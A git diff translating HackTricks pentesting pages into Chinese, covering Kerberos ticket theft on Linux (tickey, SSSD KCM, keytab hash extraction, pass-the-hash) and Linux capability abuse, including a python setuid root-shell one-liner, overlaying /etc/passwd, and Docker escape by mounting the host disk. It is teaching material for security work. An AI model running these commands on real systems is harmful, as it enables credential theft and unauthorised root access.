[https://github.com/TarlogicSecurity/tickey](https://github.com/TarlogicSecurity/tickey), which facilitates the extraction by injecting into sessions and dumping tickets into `/tmp`. - -To configure and use this tool, the steps below are followed: +**存储在进程内存中的 Kerberos 票据可以被提取**,特别是在机器的 ptrace 保护被禁用时(`/proc/sys/kernel/yama/ptrace_scope`)。一个有用的工具可以在 [https://github.com/TarlogicSecurity/tickey](https://github.com/TarlogicSecurity/tickey) 找到,它通过注入会话并将票据转储到 `/tmp` 来便于提取。 +要配置和使用此工具,请按照以下步骤进行: ```bash git clone https://github.com/TarlogicSecurity/tickey cd tickey/tickey make CONF=Release /tmp/tickey -i ``` +此过程将尝试注入到各种会话中,通过将提取的票证存储在 `/tmp` 中,命名约定为 `__krb_UID.ccache` 来指示成功。 -This procedure will attempt to inject into various sessions, indicating success by storing extracted tickets in `/tmp` with a naming convention of `__krb_UID.ccache`. +### 来自SSSD KCM的CCACHE票证重用 -### CCACHE ticket reuse from SSSD KCM - -SSSD maintains a copy of the database at the path `/var/lib/sss/secrets/secrets.ldb`. The corresponding key is stored as a hidden file at the path `/var/lib/sss/secrets/.secrets.mkey`. By default, the key is only readable if you have **root** permissions. - -Invoking \*\*`SSSDKCMExtractor` \*\* with the --database and --key parameters will parse the database and **decrypt the secrets**. +SSSD在路径 `/var/lib/sss/secrets/secrets.ldb` 处维护数据库的副本。相应的密钥存储为隐藏文件,路径为 `/var/lib/sss/secrets/.secrets.mkey`。默认情况下,只有在您具有 **root** 权限时,才能读取该密钥。 +使用 **`SSSDKCMExtractor`** 及 --database 和 --key 参数将解析数据库并 **解密秘密**。 ```bash git clone https://github.com/fireeye/SSSDKCMExtractor python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey ``` +**凭证缓存 Kerberos blob 可以转换为可用的 Kerberos CCache** 文件,可以传递给 Mimikatz/Rubeus。 -The **credential cache Kerberos blob can be converted into a usable Kerberos CCache** file that can be passed to Mimikatz/Rubeus. - -### CCACHE ticket reuse from keytab - +### 从 keytab 重用 CCACHE 票证 ```bash git clone https://github.com/its-a-feature/KeytabParser python KeytabParser.py /etc/krb5.keytab klist -k /etc/krb5.keytab ``` +### 从 /etc/krb5.keytab 提取账户 -### Extract accounts from /etc/krb5.keytab - -Service account keys, essential for services operating with root privileges, are securely stored in **`/etc/krb5.keytab`** files. These keys, akin to passwords for services, demand strict confidentiality. - -To inspect the keytab file's contents, **`klist`** can be employed. The tool is designed to display key details, including the **NT Hash** for user authentication, particularly when the key type is identified as 23. +服务账户密钥,对于以 root 权限运行的服务至关重要,安全地存储在 **`/etc/krb5.keytab`** 文件中。这些密钥类似于服务的密码,要求严格保密。 +要检查 keytab 文件的内容,可以使用 **`klist`**。该工具旨在显示密钥详细信息,包括用户身份验证的 **NT Hash**,特别是当密钥类型被识别为 23 时。 ```bash klist.exe -t -K -e -k FILE:C:/Path/to/your/krb5.keytab # Output includes service principal details and the NT Hash ``` - -For Linux users, **`KeyTabExtract`** offers functionality to extract the RC4 HMAC hash, which can be leveraged for NTLM hash reuse. - +对于Linux用户,**`KeyTabExtract`** 提供了提取RC4 HMAC哈希的功能,这可以用于NTLM哈希重用。 ```bash python3 keytabextract.py krb5.keytab # Expected output varies based on hash availability ``` - -On macOS, **`bifrost`** serves as a tool for keytab file analysis. - +在 macOS 上,**`bifrost`** 作为一个工具用于 keytab 文件分析。 ```bash ./bifrost -action dump -source keytab -path /path/to/your/file ``` - -Utilizing the extracted account and hash information, connections to servers can be established using tools like **`crackmapexec`**. - +利用提取的账户和哈希信息,可以使用工具如 **`crackmapexec`** 建立与服务器的连接。 ```bash crackmapexec 10.XXX.XXX.XXX -u 'ServiceAccount$' -H "HashPlaceholder" -d "YourDOMAIN" ``` - -## References +## 参考 - [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/) - [https://github.com/TarlogicSecurity/tickey](https://github.com/TarlogicSecurity/tickey) - [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#linux-active-directory](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#linux-active-directory) -{% embed url="https://websec.nl/" %} - {{#include ../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/linux-capabilities.md b/src/linux-hardening/privilege-escalation/linux-capabilities.md index 2fa1b2717..6ace3a0d4 100644 --- a/src/linux-hardening/privilege-escalation/linux-capabilities.md +++ b/src/linux-hardening/privilege-escalation/linux-capabilities.md @@ -2,90 +2,79 @@ {{#include ../../banners/hacktricks-training.md}} -
- -​​​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.\\ - -{% embed url="https://www.rootedcon.com/" %} - ## Linux Capabilities -Linux capabilities divide **root privileges into smaller, distinct units**, allowing processes to have a subset of privileges. This minimizes the risks by not granting full root privileges unnecessarily. +Linux capabilities 将 **root 权限划分为更小、独立的单元**,允许进程拥有一部分权限。这通过不必要地授予完全的 root 权限来最小化风险。 -### The Problem: +### 问题: -- Normal users have limited permissions, affecting tasks like opening a network socket which requires root access. +- 普通用户的权限有限,影响诸如打开需要 root 访问的网络套接字等任务。 -### Capability Sets: +### 权限集: -1. **Inherited (CapInh)**: +1. **Inherited (CapInh)**: - - **Purpose**: Determines the capabilities passed down from the parent process. - - **Functionality**: When a new process is created, it inherits the capabilities from its parent in this set. Useful for maintaining certain privileges across process spawns. - - **Restrictions**: A process cannot gain capabilities that its parent did not possess. +- **目的**:确定从父进程传递下来的能力。 +- **功能**:当创建新进程时,它从其父进程继承此集合中的能力。对于在进程生成中维护某些权限非常有用。 +- **限制**:进程不能获得其父进程未拥有的能力。 -2. **Effective (CapEff)**: +2. **Effective (CapEff)**: - - **Purpose**: Represents the actual capabilities a process is utilizing at any moment. - - **Functionality**: It's the set of capabilities checked by the kernel to grant permission for various operations. For files, this set can be a flag indicating if the file's permitted capabilities are to be considered effective. - - **Significance**: The effective set is crucial for immediate privilege checks, acting as the active set of capabilities a process can use. +- **目的**:表示进程在任何时刻实际使用的能力。 +- **功能**:这是内核检查以授予各种操作权限的能力集合。对于文件,这个集合可以是一个标志,指示文件的允许能力是否被视为有效。 +- **重要性**:有效集合对于即时权限检查至关重要,充当进程可以使用的活动能力集合。 -3. **Permitted (CapPrm)**: +3. **Permitted (CapPrm)**: - - **Purpose**: Defines the maximum set of capabilities a process can possess. - - **Functionality**: A process can elevate a capability from the permitted set to its effective set, giving it the ability to use that capability. It can also drop capabilities from its permitted set. - - **Boundary**: It acts as an upper limit for the capabilities a process can have, ensuring a process doesn't exceed its predefined privilege scope. +- **目的**:定义进程可以拥有的最大能力集合。 +- **功能**:进程可以将权限集合中的能力提升到其有效集合,从而使其能够使用该能力。它还可以从其权限集合中删除能力。 +- **边界**:它作为进程可以拥有的能力的上限,确保进程不会超出其预定义的权限范围。 -4. **Bounding (CapBnd)**: +4. **Bounding (CapBnd)**: - - **Purpose**: Puts a ceiling on the capabilities a process can ever acquire during its lifecycle. - - **Functionality**: Even if a process has a certain capability in its inheritable or permitted set, it cannot acquire that capability unless it's also in the bounding set. - - **Use-case**: This set is particularly useful for restricting a process's privilege escalation potential, adding an extra layer of security. - -5. **Ambient (CapAmb)**: - - **Purpose**: Allows certain capabilities to be maintained across an `execve` system call, which typically would result in a full reset of the process's capabilities. - - **Functionality**: Ensures that non-SUID programs that don't have associated file capabilities can retain certain privileges. - - **Restrictions**: Capabilities in this set are subject to the constraints of the inheritable and permitted sets, ensuring they don't exceed the process's allowed privileges. +- **目的**:对进程在其生命周期内可以获得的能力设置上限。 +- **功能**:即使进程在其可继承或允许的集合中具有某种能力,除非它也在边界集合中,否则无法获得该能力。 +- **用例**:此集合特别有助于限制进程的权限提升潜力,增加额外的安全层。 +5. **Ambient (CapAmb)**: +- **目的**:允许某些能力在 `execve` 系统调用中保持,这通常会导致进程能力的完全重置。 +- **功能**:确保没有相关文件能力的非 SUID 程序可以保留某些权限。 +- **限制**:此集合中的能力受可继承和允许集合的约束,确保它们不会超出进程的允许权限。 ```python # Code to demonstrate the interaction of different capability sets might look like this: # Note: This is pseudo-code for illustrative purposes only. def manage_capabilities(process): - if process.has_capability('cap_setpcap'): - process.add_capability_to_set('CapPrm', 'new_capability') - process.limit_capabilities('CapBnd') - process.preserve_capabilities_across_execve('CapAmb') +if process.has_capability('cap_setpcap'): +process.add_capability_to_set('CapPrm', 'new_capability') +process.limit_capabilities('CapBnd') +process.preserve_capabilities_across_execve('CapAmb') ``` - -For further information check: +有关更多信息,请查看: - [https://blog.container-solutions.com/linux-capabilities-why-they-exist-and-how-they-work](https://blog.container-solutions.com/linux-capabilities-why-they-exist-and-how-they-work) - [https://blog.ploetzli.ch/2014/understanding-linux-capabilities/](https://blog.ploetzli.ch/2014/understanding-linux-capabilities/) -## Processes & Binaries Capabilities +## 进程与二进制文件能力 -### Processes Capabilities +### 进程能力 -To see the capabilities for a particular process, use the **status** file in the /proc directory. As it provides more details, let’s limit it only to the information related to Linux capabilities.\ -Note that for all running processes capability information is maintained per thread, for binaries in the file system it’s stored in extended attributes. +要查看特定进程的能力,请使用 /proc 目录中的 **status** 文件。由于它提供了更多细节,让我们仅限于与 Linux 能力相关的信息。\ +请注意,对于所有正在运行的进程,能力信息是按线程维护的,对于文件系统中的二进制文件,它存储在扩展属性中。 -You can find the capabilities defined in /usr/include/linux/capability.h - -You can find the capabilities of the current process in `cat /proc/self/status` or doing `capsh --print` and of other users in `/proc//status` +您可以在 /usr/include/linux/capability.h 中找到定义的能力。 +您可以在 `cat /proc/self/status` 中找到当前进程的能力,或通过 `capsh --print` 查看其他用户的能力在 `/proc//status` 中。 ```bash cat /proc/1234/status | grep Cap cat /proc/$$/status | grep Cap #This will print the capabilities of the current process ``` +此命令在大多数系统上应返回 5 行。 -This command should return 5 lines on most systems. - -- CapInh = Inherited capabilities -- CapPrm = Permitted capabilities -- CapEff = Effective capabilities -- CapBnd = Bounding set -- CapAmb = Ambient capabilities set - +- CapInh = 继承的能力 +- CapPrm = 允许的能力 +- CapEff = 有效的能力 +- CapBnd = 边界集 +- CapAmb = 环境能力集 ```bash #These are the typical capabilities of a root owned process (all) CapInh: 0000000000000000 @@ -94,16 +83,12 @@ CapEff: 0000003fffffffff CapBnd: 0000003fffffffff CapAmb: 0000000000000000 ``` - -These hexadecimal numbers don’t make sense. Using the capsh utility we can decode them into the capabilities name. - +这些十六进制数字没有意义。使用 capsh 工具,我们可以将它们解码为能力名称。 ```bash capsh --decode=0000003fffffffff 0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,37 ``` - -Lets check now the **capabilities** used by `ping`: - +现在让我们检查一下 `ping` 使用的 **capabilities**: ```bash cat /proc/9491/status | grep Cap CapInh: 0000000000000000 @@ -115,15 +100,11 @@ CapAmb: 0000000000000000 capsh --decode=0000000000003000 0x0000000000003000=cap_net_admin,cap_net_raw ``` - -Although that works, there is another and easier way. To see the capabilities of a running process, simply use the **getpcaps** tool followed by its process ID (PID). You can also provide a list of process IDs. - +虽然这样可以工作,但还有另一种更简单的方法。要查看正在运行的进程的能力,只需使用 **getpcaps** 工具,后面跟上其进程 ID (PID)。您还可以提供一个进程 ID 列表。 ```bash getpcaps 1234 ``` - -Lets check here the capabilities of `tcpdump` after having giving the binary enough capabilities (`cap_net_admin` and `cap_net_raw`) to sniff the network (_tcpdump is running in process 9562_): - +让我们检查一下 `tcpdump` 的能力,在给二进制文件足够的能力(`cap_net_admin` 和 `cap_net_raw`)以嗅探网络之后(_tcpdump 正在进程 9562 中运行_): ```bash #The following command give tcpdump the needed capabilities to sniff traffic $ setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump @@ -141,53 +122,43 @@ CapAmb: 0000000000000000 $ capsh --decode=0000000000003000 0x0000000000003000=cap_net_admin,cap_net_raw ``` +如您所见,给定的能力与获取二进制文件能力的两种方法的结果相对应。\ +_getpcaps_ 工具使用 **capget()** 系统调用查询特定线程的可用能力。此系统调用只需提供 PID 即可获取更多信息。 -As you can see the given capabilities corresponds with the results of the 2 ways of getting the capabilities of a binary.\ -The _getpcaps_ tool uses the **capget()** system call to query the available capabilities for a particular thread. This system call only needs to provide the PID to obtain more information. - -### Binaries Capabilities - -Binaries can have capabilities that can be used while executing. For example, it's very common to find `ping` binary with `cap_net_raw` capability: +### 二进制文件能力 +二进制文件可以具有在执行时可以使用的能力。例如,常见的情况是找到具有 `cap_net_raw` 能力的 `ping` 二进制文件: ```bash getcap /usr/bin/ping /usr/bin/ping = cap_net_raw+ep ``` - -You can **search binaries with capabilities** using: - +您可以使用 **search binaries with capabilities**: ```bash getcap -r / 2>/dev/null ``` - ### Dropping capabilities with capsh -If we drop the CAP*NET_RAW capabilities for \_ping*, then the ping utility should no longer work. - +如果我们为 \_ping* 删除 CAP*NET_RAW 能力,那么 ping 工具将不再工作。 ```bash capsh --drop=cap_net_raw --print -- -c "tcpdump" ``` +除了 _capsh_ 本身的输出,_tcpdump_ 命令本身也应该引发错误。 -Besides the output of _capsh_ itself, the _tcpdump_ command itself should also raise an error. +> /bin/bash: /usr/sbin/tcpdump: 操作不允许 -> /bin/bash: /usr/sbin/tcpdump: Operation not permitted +错误清楚地表明 ping 命令不允许打开 ICMP 套接字。现在我们可以确定这按预期工作。 -The error clearly shows that the ping command is not allowed to open an ICMP socket. Now we know for sure that this works as expected. - -### Remove Capabilities - -You can remove capabilities of a binary with +### 移除能力 +您可以通过以下方式移除二进制文件的能力: ```bash setcap -r ``` +## 用户能力 -## User Capabilities - -Apparently **it's possible to assign capabilities also to users**. This probably means that every process executed by the user will be able to use the users capabilities.\ -Base on on [this](https://unix.stackexchange.com/questions/454708/how-do-you-add-cap-sys-admin-permissions-to-user-in-centos-7), [this ](http://manpages.ubuntu.com/manpages/bionic/man5/capability.conf.5.html)and [this ](https://stackoverflow.com/questions/1956732/is-it-possible-to-configure-linux-capabilities-per-user)a few files new to be configured to give a user certain capabilities but the one assigning the capabilities to each user will be `/etc/security/capability.conf`.\ -File example: - +显然**也可以将能力分配给用户**。这可能意味着用户执行的每个进程都将能够使用用户的能力。\ +根据[这个](https://unix.stackexchange.com/questions/454708/how-do-you-add-cap-sys-admin-permissions-to-user-in-centos-7)、[这个](http://manpages.ubuntu.com/manpages/bionic/man5/capability.conf.5.html)和[这个](https://stackoverflow.com/questions/1956732/is-it-possible-to-configure-linux-capabilities-per-user),需要配置一些文件以赋予用户某些能力,但分配能力给每个用户的文件将是`/etc/security/capability.conf`。\ +文件示例: ```bash # Simple cap_sys_ptrace developer @@ -201,24 +172,22 @@ cap_net_admin,cap_net_raw jrnetadmin # Combining names and numerics cap_sys_admin,22,25 jrsysadmin ``` +## 环境能力 -## Environment Capabilities - -Compiling the following program it's possible to **spawn a bash shell inside an environment that provides capabilities**. - +编译以下程序可以**在提供能力的环境中生成一个 bash shell**。 ```c:ambient.c /* - * Test program for the ambient capabilities - * - * compile using: - * gcc -Wl,--no-as-needed -lcap-ng -o ambient ambient.c - * Set effective, inherited and permitted capabilities to the compiled binary - * sudo setcap cap_setpcap,cap_net_raw,cap_net_admin,cap_sys_nice+eip ambient - * - * To get a shell with additional caps that can be inherited do: - * - * ./ambient /bin/bash - */ +* Test program for the ambient capabilities +* +* compile using: +* gcc -Wl,--no-as-needed -lcap-ng -o ambient ambient.c +* Set effective, inherited and permitted capabilities to the compiled binary +* sudo setcap cap_setpcap,cap_net_raw,cap_net_admin,cap_sys_nice+eip ambient +* +* To get a shell with additional caps that can be inherited do: +* +* ./ambient /bin/bash +*/ #include #include @@ -229,70 +198,70 @@ Compiling the following program it's possible to **spawn a bash shell inside an #include static void set_ambient_cap(int cap) { - int rc; - capng_get_caps_process(); - rc = capng_update(CAPNG_ADD, CAPNG_INHERITABLE, cap); - if (rc) { - printf("Cannot add inheritable cap\n"); - exit(2); - } - capng_apply(CAPNG_SELECT_CAPS); - /* Note the two 0s at the end. Kernel checks for these */ - if (prctl(PR_CAP_AMBIENT, PR_CAP_AMBIENT_RAISE, cap, 0, 0)) { - perror("Cannot set cap"); - exit(1); - } +int rc; +capng_get_caps_process(); +rc = capng_update(CAPNG_ADD, CAPNG_INHERITABLE, cap); +if (rc) { +printf("Cannot add inheritable cap\n"); +exit(2); +} +capng_apply(CAPNG_SELECT_CAPS); +/* Note the two 0s at the end. Kernel checks for these */ +if (prctl(PR_CAP_AMBIENT, PR_CAP_AMBIENT_RAISE, cap, 0, 0)) { +perror("Cannot set cap"); +exit(1); +} } void usage(const char * me) { - printf("Usage: %s [-c caps] new-program new-args\n", me); - exit(1); +printf("Usage: %s [-c caps] new-program new-args\n", me); +exit(1); } int default_caplist[] = { - CAP_NET_RAW, - CAP_NET_ADMIN, - CAP_SYS_NICE, - -1 +CAP_NET_RAW, +CAP_NET_ADMIN, +CAP_SYS_NICE, +-1 }; int * get_caplist(const char * arg) { - int i = 1; - int * list = NULL; - char * dup = strdup(arg), * tok; - for (tok = strtok(dup, ","); tok; tok = strtok(NULL, ",")) { - list = realloc(list, (i + 1) * sizeof(int)); - if (!list) { - perror("out of memory"); - exit(1); - } - list[i - 1] = atoi(tok); - list[i] = -1; - i++; - } - return list; +int i = 1; +int * list = NULL; +char * dup = strdup(arg), * tok; +for (tok = strtok(dup, ","); tok; tok = strtok(NULL, ",")) { +list = realloc(list, (i + 1) * sizeof(int)); +if (!list) { +perror("out of memory"); +exit(1); +} +list[i - 1] = atoi(tok); +list[i] = -1; +i++; +} +return list; } int main(int argc, char ** argv) { - int rc, i, gotcaps = 0; - int * caplist = NULL; - int index = 1; // argv index for cmd to start - if (argc < 2) - usage(argv[0]); - if (strcmp(argv[1], "-c") == 0) { - if (argc <= 3) { - usage(argv[0]); - } - caplist = get_caplist(argv[2]); - index = 3; - } - if (!caplist) { - caplist = (int * ) default_caplist; - } - for (i = 0; caplist[i] != -1; i++) { - printf("adding %d to ambient list\n", caplist[i]); - set_ambient_cap(caplist[i]); - } - printf("Ambient forking shell\n"); - if (execv(argv[index], argv + index)) - perror("Cannot exec"); - return 0; +int rc, i, gotcaps = 0; +int * caplist = NULL; +int index = 1; // argv index for cmd to start +if (argc < 2) +usage(argv[0]); +if (strcmp(argv[1], "-c") == 0) { +if (argc <= 3) { +usage(argv[0]); +} +caplist = get_caplist(argv[2]); +index = 3; +} +if (!caplist) { +caplist = (int * ) default_caplist; +} +for (i = 0; caplist[i] != -1; i++) { +printf("adding %d to ambient list\n", caplist[i]); +set_ambient_cap(caplist[i]); +} +printf("Ambient forking shell\n"); +if (execv(argv[index], argv + index)) +perror("Cannot exec"); +return 0; } ``` @@ -301,40 +270,34 @@ gcc -Wl,--no-as-needed -lcap-ng -o ambient ambient.c sudo setcap cap_setpcap,cap_net_raw,cap_net_admin,cap_sys_nice+eip ambient ./ambient /bin/bash ``` - -Inside the **bash executed by the compiled ambient binary** it's possible to observe the **new capabilities** (a regular user won't have any capability in the "current" section). - +在**由编译的环境二进制文件执行的bash内部**,可以观察到**新的能力**(普通用户在“当前”部分不会有任何能力)。 ```bash capsh --print Current: = cap_net_admin,cap_net_raw,cap_sys_nice+eip ``` - > [!CAUTION] -> You can **only add capabilities that are present** in both the permitted and the inheritable sets. +> 你只能**添加在** permitted 和 inheritable 集合中**存在的能力**。 -### Capability-aware/Capability-dumb binaries +### 能力感知/能力无知的二进制文件 -The **capability-aware binaries won't use the new capabilities** given by the environment, however the **capability dumb binaries will us**e them as they won't reject them. This makes capability-dumb binaries vulnerable inside a special environment that grant capabilities to binaries. +**能力感知的二进制文件不会使用环境中提供的新能力**,然而**能力无知的二进制文件会使用**它们,因为它们不会拒绝这些能力。这使得能力无知的二进制文件在一个授予二进制文件能力的特殊环境中变得脆弱。 -## Service Capabilities - -By default a **service running as root will have assigned all the capabilities**, and in some occasions this may be dangerous.\ -Therefore, a **service configuration** file allows to **specify** the **capabilities** you want it to have, **and** the **user** that should execute the service to avoid running a service with unnecessary privileges: +## 服务能力 +默认情况下,**以 root 身份运行的服务将被分配所有能力**,在某些情况下这可能是危险的。\ +因此,**服务配置**文件允许**指定**你希望它拥有的**能力**,**以及**应该执行该服务的**用户**,以避免以不必要的权限运行服务: ```bash [Service] User=bob AmbientCapabilities=CAP_NET_BIND_SERVICE ``` +## Docker 容器中的能力 -## Capabilities in Docker Containers - -By default Docker assigns a few capabilities to the containers. It's very easy to check which capabilities are these by running: - +默认情况下,Docker 为容器分配了一些能力。通过运行以下命令,可以很容易地检查这些能力: ```bash docker run --rm -it r.j3ss.co/amicontained bash Capabilities: - BOUNDING -> chown dac_override fowner fsetid kill setgid setuid setpcap net_bind_service net_raw sys_chroot mknod audit_write setfcap +BOUNDING -> chown dac_override fowner fsetid kill setgid setuid setpcap net_bind_service net_raw sys_chroot mknod audit_write setfcap # Add a capabilities docker run --rm -it --cap-add=SYS_ADMIN r.j3ss.co/amicontained bash @@ -345,21 +308,11 @@ docker run --rm -it --cap-add=ALL r.j3ss.co/amicontained bash # Remove all and add only one docker run --rm -it --cap-drop=ALL --cap-add=SYS_PTRACE r.j3ss.co/amicontained bash ``` - -​ - -
- -​​​​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - ## Privesc/Container Escape -Capabilities are useful when you **want to restrict your own processes after performing privileged operations** (e.g. after setting up chroot and binding to a socket). However, they can be exploited by passing them malicious commands or arguments which are then run as root. - -You can force capabilities upon programs using `setcap`, and query these using `getcap`: +能力在你**想要在执行特权操作后限制自己的进程**时非常有用(例如,在设置 chroot 和绑定到套接字之后)。然而,它们可以通过传递恶意命令或参数来被利用,这些命令或参数随后以 root 身份运行。 +你可以使用 `setcap` 强制程序使用能力,并使用 `getcap` 查询这些能力: ```bash #Set Capability setcap cap_net_raw+ep /sbin/ping @@ -368,19 +321,15 @@ setcap cap_net_raw+ep /sbin/ping getcap /sbin/ping /sbin/ping = cap_net_raw+ep ``` +`+ep` 表示您正在将能力添加为有效和允许(“-”将移除它)。 -The `+ep` means you’re adding the capability (“-” would remove it) as Effective and Permitted. - -To identify programs in a system or folder with capabilities: - +要识别系统或文件夹中具有能力的程序: ```bash getcap -r / 2>/dev/null ``` +### 利用示例 -### Exploitation example - -In the following example the binary `/usr/bin/python2.6` is found vulnerable to privesc: - +在以下示例中,发现二进制文件 `/usr/bin/python2.6` 存在提权漏洞: ```bash setcap cap_setuid+ep /usr/bin/python2.7 /usr/bin/python2.7 = cap_setuid+ep @@ -388,46 +337,38 @@ setcap cap_setuid+ep /usr/bin/python2.7 #Exploit /usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash");' ``` - -**Capabilities** needed by `tcpdump` to **allow any user to sniff packets**: - +**tcpdump** 所需的 **能力** 以 **允许任何用户嗅探数据包**: ```bash setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump getcap /usr/sbin/tcpdump /usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip ``` +### "空" 能力的特殊情况 -### The special case of "empty" capabilities +[来自文档](https://man7.org/linux/man-pages/man7/capabilities.7.html):请注意,可以将空能力集分配给程序文件,因此可以创建一个设置用户ID为root的程序,该程序将执行该程序的进程的有效和保存的用户ID更改为0,但不会赋予该进程任何能力。简单来说,如果你有一个二进制文件: -[From the docs](https://man7.org/linux/man-pages/man7/capabilities.7.html): Note that one can assign empty capability sets to a program file, and thus it is possible to create a set-user-ID-root program that changes the effective and saved set-user-ID of the process that executes the program to 0, but confers no capabilities to that process. Or, simply put, if you have a binary that: +1. 不属于root +2. 没有设置 `SUID`/`SGID` 位 +3. 设置了空能力(例如:`getcap myelf` 返回 `myelf =ep`) -1. is not owned by root -2. has no `SUID`/`SGID` bits set -3. has empty capabilities set (e.g.: `getcap myelf` returns `myelf =ep`) - -then **that binary will run as root**. +那么**该二进制文件将以root身份运行**。 ## CAP_SYS_ADMIN -**[`CAP_SYS_ADMIN`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** is a highly potent Linux capability, often equated to a near-root level due to its extensive **administrative privileges**, such as mounting devices or manipulating kernel features. While indispensable for containers simulating entire systems, **`CAP_SYS_ADMIN` poses significant security challenges**, especially in containerized environments, due to its potential for privilege escalation and system compromise. Therefore, its usage warrants stringent security assessments and cautious management, with a strong preference for dropping this capability in application-specific containers to adhere to the **principle of least privilege** and minimize the attack surface. - -**Example with binary** +**[`CAP_SYS_ADMIN`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** 是一种非常强大的Linux能力,通常被视为接近root级别,因为它具有广泛的**管理权限**,例如挂载设备或操纵内核特性。虽然对于模拟整个系统的容器来说是不可或缺的,但**`CAP_SYS_ADMIN` 带来了重大的安全挑战**,尤其是在容器化环境中,因为它可能导致特权提升和系统妥协。因此,其使用需要严格的安全评估和谨慎管理,强烈建议在特定应用的容器中放弃此能力,以遵循**最小权限原则**并最小化攻击面。 +**带有二进制文件的示例** ```bash getcap -r / 2>/dev/null /usr/bin/python2.7 = cap_sys_admin+ep ``` - -Using python you can mount a modified _passwd_ file on top of the real _passwd_ file: - +使用 Python,您可以将修改过的 _passwd_ 文件挂载到真实的 _passwd_ 文件上: ```bash cp /etc/passwd ./ #Create a copy of the passwd file openssl passwd -1 -salt abc password #Get hash of "password" vim ./passwd #Change roots passwords of the fake passwd file ``` - -And finally **mount** the modified `passwd` file on `/etc/passwd`: - +最后**挂载**修改后的 `passwd` 文件到 `/etc/passwd`: ```python from ctypes import * libc = CDLL("libc.so.6") @@ -440,32 +381,28 @@ options = b"rw" mountflags = MS_BIND libc.mount(source, target, filesystemtype, mountflags, options) ``` +您将能够 **`su` 为 root**,使用密码 "password"。 -And you will be able to **`su` as root** using password "password". - -**Example with environment (Docker breakout)** - -You can check the enabled capabilities inside the docker container using: +**带环境的示例(Docker 逃逸)** +您可以使用以下命令检查 Docker 容器内启用的能力: ``` capsh --print Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read+ep Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read Securebits: 00/0x0/1'b0 - secure-noroot: no (unlocked) - secure-no-suid-fixup: no (unlocked) - secure-keep-caps: no (unlocked) +secure-noroot: no (unlocked) +secure-no-suid-fixup: no (unlocked) +secure-keep-caps: no (unlocked) uid=0(root) gid=0(root) groups=0(root) ``` +在之前的输出中,您可以看到 SYS_ADMIN 能力已启用。 -Inside the previous output you can see that the SYS_ADMIN capability is enabled. - -- **Mount** - -This allows the docker container to **mount the host disk and access it freely**: +- **挂载** +这允许 docker 容器 **挂载主机磁盘并自由访问**: ```bash fdisk -l #Get disk name Disk /dev/sda: 4 GiB, 4294967296 bytes, 8388608 sectors @@ -477,12 +414,10 @@ mount /dev/sda /mnt/ #Mount it cd /mnt chroot ./ bash #You have a shell inside the docker hosts disk ``` +- **完全访问** -- **Full access** - -In the previous method we managed to access the docker host disk.\ -In case you find that the host is running an **ssh** server, you could **create a user inside the docker host** disk and access it via SSH: - +在前一种方法中,我们成功访问了docker主机磁盘。\ +如果您发现主机正在运行**ssh**服务器,您可以**在docker主机**磁盘中创建一个用户并通过SSH访问它: ```bash #Like in the example before, the first step is to mount the docker host disk fdisk -l @@ -496,15 +431,13 @@ nc -v -n -w2 -z 172.17.0.1 1-65535 chroot /mnt/ adduser john ssh john@172.17.0.1 -p 2222 ``` - ## CAP_SYS_PTRACE -**This means that you can escape the container by injecting a shellcode inside some process running inside the host.** To access processes running inside the host the container needs to be run at least with **`--pid=host`**. +**这意味着您可以通过在主机上运行的某个进程中注入 shellcode 来逃离容器。** 要访问在主机上运行的进程,容器需要至少以 **`--pid=host`** 运行。 